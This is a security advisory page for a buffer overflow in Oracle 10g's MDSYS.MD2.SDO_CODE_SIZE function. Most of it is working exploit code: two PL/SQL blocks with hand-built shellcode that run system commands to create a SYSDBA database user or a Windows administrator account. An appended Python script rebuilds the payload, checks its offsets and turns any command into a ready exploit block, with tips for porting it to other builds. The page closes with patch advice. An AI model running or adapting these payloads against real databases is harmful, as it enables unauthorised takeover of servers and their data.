Oracle Exploit Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE

Name: Oracle Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Systems Affected: Oracle 10g
Severity: High Risk
Category: Buffer Overflow
Vendor URL: http://www.oracle.com/
Credit: Esteban Martinez Fayo
Exploit: http://www.argeniss.com/research/oraclesqlinj.zip
Date: 05 May 2005 (V 1.00)


Details

MDSYS.MD2.SDO_CODE_SIZE, a function in the Oracle Spatial MD2 package that takes a VARCHAR2 LAYER argument, does not bound-check that argument. An overlong LAYER value overwrites the stack, including the saved return address, so any database user who can execute the package obtains arbitrary code execution inside the Oracle server process. On Windows that process normally runs as LocalSystem, which is why the two payloads below can create a database user with DBA and SYSDBA privileges (by running a local sqlplus "/ as sysdba" session) or a local Windows administrator account.

The payload works in three stages, as the disassembly comments in the code show: the overwritten return address points at a DEC EBX / CALL EBX gadget in userenv.dll (the exploit relies on EBX pointing one byte past the attacker-controlled data at that moment); the five-byte stub that CALL EBX reaches adds 9 to EBX to hop over itself and the return address; and the 19-byte shellcode it jumps to passes the address of the trailing command string (EBX+0x13) to MSVCRT.system, then calls _endthread so the thread exits cleanly instead of returning through the smashed stack.


Example for Windows 2000 SP4 + Oracle 10.1.0.2. The userenv.dll and msvcrt.dll addresses hard-coded below belong to that OS and DLL build; on any other target they have to be found again.
--Create a database user HACKER with SYSDBA privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH' -- filler up to the saved return address
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR(227) || CHR(120) -- Overwritten return address: 0x78E35AFB, little-endian
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || CHR(184) || CHR(191) || CHR(142) || CHR(1) || CHR(120) || CHR(255) || CHR(208) || CHR(184) || CHR(147) || CHR(131) || CHR(0) || CHR(120) || CHR(255) || CHR(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
-- Command string handed to system(); '&' is written as chr(38) so SQL*Plus does not treat it as a substitution variable
|| 'echo CREATE USER HACKER IDENTIFIED BY HACKER; > c:\cu.sql'||chr(38)||'echo GRANT DBA TO HACKER; >> c:\cu.sql '||chr(38)||' echo ALTER USER HACKER DEFAULT ROLE DBA; >> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "HACKER" WITH ADMIN OPTION; >> c:\cu.sql'||chr(38)||'echo QUIT >> c:\cu.sql '||chr(38)||' c:\oracle\10.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1> c:\stdout.log 2> c:\stderr.log';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;
/

--Create a Windows OS user HACKER with administrator privileges
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH' -- filler up to the saved return address
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR(227) || CHR(120) -- Overwritten return address: 0x78E35AFB, little-endian
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || CHR(184) || CHR(191) || CHR(142) || CHR(1) || CHR(120) || CHR(255) || CHR(208) || CHR(184) || CHR(147) || CHR(131) || CHR(0) || CHR(120) || CHR(255) || CHR(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
-- 'Administradores' is the Spanish name of the local Administrators group; on an English Windows install it is 'Administrators'
|| 'net user hacker /add '||chr(38)||' net localgroup Administradores hacker /add '||chr(38)||' net localgroup ORA_DBA hacker /add';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;
/
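The following Python script is an added example, not code from Argeniss or from Red-Database-Security. It rebuilds the byte string that both PL/SQL blocks above concatenate and checks the arithmetic the shellcode depends on: that ADD EBX,9 lands exactly on the shellcode and that LEA EAX,[EBX+0x13] lands exactly on the command string. It also renders an arbitrary command back into the CHR()-based PL/SQL form, keeping '&' as CHR(38) as the page does. The addresses are the page's Windows 2000 SP4 values and are wrong on any other build; the padding is copied verbatim from the page, which does not state the exact offset of the saved return address, so the script does not derive it.

```python
"""Layout check for the MDSYS.MD2.SDO_CODE_SIZE overflow payload.

Added example, not code from Argeniss or Red-Database-Security. It rebuilds
the byte string the two PL/SQL blocks above concatenate and verifies the
arithmetic the shellcode depends on. All addresses are the page's
Windows 2000 SP4 / Oracle 10.1.0.2 values and are wrong on any other build.
"""
import struct

# Addresses from the page's disassembly comments (Windows 2000 SP4 DLLs).
GADGET_DEC_EBX_CALL_EBX = 0x78E35AFB   # userenv.dll: DEC EBX / CALL EBX
MSVCRT_SYSTEM = 0x78018EBF             # msvcrt.dll: system()
MSVCRT_ENDTHREAD = 0x78008393          # msvcrt.dll: _endthread()

# Filler copied from the page; it reaches the saved return address.
PADDING = b"AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"

# 83 C3 09  ADD EBX,9   (hop over this stub and the 4-byte return address)
# FF E3     JMP EBX
STUB = bytes([0x83, 0xC3, 0x09, 0xFF, 0xE3])


def le32(addr):
    """4-byte little-endian encoding, the form an x86 CPU reads off the stack."""
    return struct.pack("<I", addr)


def shellcode():
    """The 19-byte stage that calls system(cmd) and then _endthread()."""
    return (
        bytes([0x36, 0x8D, 0x43, 0x13])     # LEA EAX,SS:[EBX+0x13] -> command string
        + b"\x50"                           # PUSH EAX
        + b"\xB8" + le32(MSVCRT_SYSTEM)     # MOV EAX,MSVCRT.system
        + b"\xFF\xD0"                       # CALL EAX
        + b"\xB8" + le32(MSVCRT_ENDTHREAD)  # MOV EAX,MSVCRT._endthread
        + b"\xFF\xD0"                       # CALL EAX
    )


def build_payload(command):
    """Bytes passed as the LAYER argument."""
    return (PADDING + STUB + le32(GADGET_DEC_EBX_CALL_EBX)
            + shellcode() + command.encode("latin-1"))


def check_layout():
    """Follow the control flow the comments describe and confirm each hop lands.

    The overwritten return address sends execution to the gadget, whose
    DEC EBX leaves EBX at the first byte of STUB (the exploit relies on
    EBX pointing one byte past it at that moment). CALL EBX runs ADD EBX,9,
    which must land exactly on the shellcode, and LEA EAX,[EBX+0x13] must
    then land on the command string.
    """
    add_imm = STUB[2]
    stub_to_shellcode = len(STUB) + 4   # stub plus the return address
    lea_disp = shellcode()[3]
    return {
        "add_ebx_imm": add_imm,
        "stub_to_shellcode": stub_to_shellcode,
        "lea_disp": lea_disp,
        "shellcode_len": len(shellcode()),
        "hops_land": add_imm == stub_to_shellcode and lea_disp == len(shellcode()),
    }


def chr_list(data):
    """Every byte as CHR(n), the way the page writes the code region."""
    return " || ".join("CHR(%d)" % b for b in data)


def to_plsql(data):
    """Printable runs as quoted literals, everything else as CHR(n).

    '&' (38) is always emitted as CHR(38) because SQL*Plus would otherwise
    treat it as a substitution variable, and a quote (39) as CHR(39) so the
    literal never needs doubling.
    """
    parts, run = [], []

    def flush():
        if run:
            parts.append("'" + "".join(run) + "'")
            run.clear()

    for b in data:
        if 32 <= b < 127 and b not in (38, 39):
            run.append(chr(b))
        else:
            flush()
            parts.append("CHR(%d)" % b)
    flush()
    return " || ".join(parts)


def plsql_block(command):
    """A complete anonymous block equivalent to the two on the page."""
    code = STUB + le32(GADGET_DEC_EBX_CALL_EBX) + shellcode()
    vc = " || ".join([to_plsql(PADDING), chr_list(code),
                      to_plsql(command.encode("latin-1"))])
    return ("DECLARE\n  a BINARY_INTEGER;\n  VC VARCHAR2(32767);\nBEGIN\n"
            "  VC := " + vc + ";\n"
            "  a := MDSYS.MD2.SDO_CODE_SIZE(LAYER => VC);\nEND;\n/\n")


if __name__ == "__main__":
    print(check_layout())
    print(plsql_block("net user hacker /add & net localgroup Administrators hacker /add"))
```

check_layout() is the part worth keeping when porting the payload to another build: if a different gadget leaves EBX somewhere else, or the shellcode grows, the two displacements (the 9 in ADD EBX,9 and the 0x13 in the LEA) have to be recomputed, and the script reports whether they still agree with the actual byte lengths.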

Patch Information
Apply the patches for Oracle Security Alert #68 or a later Critical Patch Update. Until the patch is in place, check DBA_TAB_PRIVS for EXECUTE grants on MDSYS.MD2 (in particular to PUBLIC) and restrict the package to the accounts that actually use Spatial.




© 2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.